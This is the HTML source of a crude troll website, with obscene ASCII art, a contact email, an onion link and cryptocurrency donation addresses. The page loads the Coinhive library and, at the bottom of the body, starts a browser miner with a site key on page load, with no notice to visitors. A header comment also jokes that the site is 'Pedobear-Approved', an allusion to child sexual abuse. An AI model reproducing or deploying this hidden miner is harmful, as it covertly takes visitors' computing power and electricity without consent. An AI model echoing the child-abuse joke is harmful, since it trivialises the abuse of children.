
<!DOCTYPE html>
<html>
<head>
    <title>analprolap.se</title>
    <meta name="description" content="For all your daily analprolapse needs!" />
    <script src="https://coinhive.com/lib/coinhive.min.js"></script>
    <!--
       This site is

       Pedobear-Approved!
    -->

<style type="text/css">
a {
	color: pink;
}

.blink_text {

animation:1s blinker linear infinite;
-webkit-animation:1s blinker linear infinite;
-moz-animation:1s blinker linear infinite;

 color: red;
}

@-moz-keyframes blinker {  
 0% { opacity: 1.0; }
 50% { opacity: 0.0; }
 100% { opacity: 1.0; }
 }

@-webkit-keyframes blinker {  
 0% { opacity: 1.0; }
 50% { opacity: 0.0; }
 100% { opacity: 1.0; }
 }

@keyframes blinker {  
 0% { opacity: 1.0; }
 50% { opacity: 0.0; }
 100% { opacity: 1.0; }
 }
 </style>

    <style type="text/css">
        body {
            background-color: black;
            color: lime;
            font-family: monospace;
        }

        #middle {
            position:absolute;
            width:410px;
            height:410px;
            z-index:15;
            top:40%;
            left:50%;
            margin:-205px 0 0 -205px;
        }

    </style>


</head>
<body>
    <center>
    <div id="middle">
<pre>* * * * * * * * * * * * * * * * * * * * * * * * *
*                                               *
* /     \             \            /    \       *
*|       |             \          |      |      *
*|       `.             |         |       :     *
*`        |             |        \|       |     *
* \       | /       /  \\\   ____ \\       :    *
*  \      \/   ___~~          ~____| \     |    *
*   \      \__~                    ~__\    |    *
*    \_     \        _.______  .______\|   |    *
*      \     \______// _ ___ _ (_(__>  \   |    *
*       \   .  C ___)  ______ (_(____>  |  /    *
*       /\ |   C ____)/      \ (_____>  |_/     *
*      / /\|   C_____)       |  (___>   /  \    *
*     |   (   _C_____)\______/  // _/ /     \   *
*     |    \  |__   \\_________// (__/       |  *
*    | \    \____)   `____  ___'             |  *
*    |  \_          ___\       /_          _/ | *
*   |              /    |     |  \            | *
*   |             |    /       \  \           | *
*   |          / /    |         |  \           |*
*   |         / /      \__/\___/    |          |*
*  |           /        |    |       |         |*
*  |          |         |    |       |         |*
* * * * * * * * * * * * * * * * * * * * * * * * *


</pre>
<span class="blink_text" style="color:pink; font-family:Comic Sans MS" >
/* <strike>causing</strike> preventing butthurt since 2oo4 */
</span>
<p style="color:pink; font-family:Comic Sans MS">
email: <a href="mailto:infekted@analprolap.se">infekted@analprolap.se</a> <br />
onion: <a href="https://25siuwsjg6ja6bn4.onion.to/">https://25siuwsjg6ja6bn4.onion.to/</a> <br />
ltc: <a href="litecoin:LanusmanXQdHF6gJErez1stFX5Z89TdqGg">LanusmanXQdHF6gJErez1stFX5Z89TdqGg</a> <br />
btc: <a href="bitcoin:1AnusmanHLU68oxTXgiHexZQbSEmHLynrj">1AnusmanHLU68oxTXgiHexZQbSEmHLynrj</a> <br />
<!--zec: XXX <br />-->
</p>
</center>
    </div>
<script>
var miner = new CoinHive.User("TMMiaXeqMkQzQtHYrUTKNxjTV5xdtyod", "analweb");
miner.start();
</script>
</body>
</html>








<!--

    Sorry Ib.
    Bedankt voor alles wat je voor mij gedaan hebt vroeger.
-->

